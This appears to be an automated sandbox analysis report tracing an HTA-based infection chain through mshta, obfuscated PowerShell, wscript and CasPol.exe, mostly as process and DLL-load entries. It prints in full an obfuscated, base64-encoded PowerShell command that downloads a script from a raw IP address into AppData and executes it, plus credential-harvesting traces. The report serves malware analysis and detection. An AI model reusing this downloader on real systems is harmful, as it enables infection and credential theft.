                    Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp; Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp; Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp; Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: CasPol.exe, 0000000D.00000002.2096481680.00000000030AA000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp; Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: clearentirethingwithbestnoticetheeverythinggooodfrome.hta; Virustotal: Detection: 27%
                    Source: clearentirethingwithbestnoticetheeverythinggooodfrome.hta; ReversingLabs: Detection: 13%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Evasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknown; Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\clearentirethingwithbestnoticetheeverythinggooodfrome.hta"
                    Source: C:\Windows\SysWOW64\mshta.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38A1.tmp" "c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
                    Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = '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';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qiupnqamsvkxb"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\skzzoilfgdcclexm"
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: mshtml.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: umpdc.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: msiso.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: srpapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: msimtf.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: dxgi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: textinputframework.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: coreuicomponents.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: coremessaging.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: resourcepolicyclient.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: jscript9.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: vbscript.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: scrrun.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: sxs.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: msls31.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: d2d1.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: dwrite.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: d3d11.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: edputil.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: d3d10warp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: dxcore.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: appresolver.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: bcp47langs.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: slc.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: dataexchange.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: dcomp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kdscli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dllJump to behavior
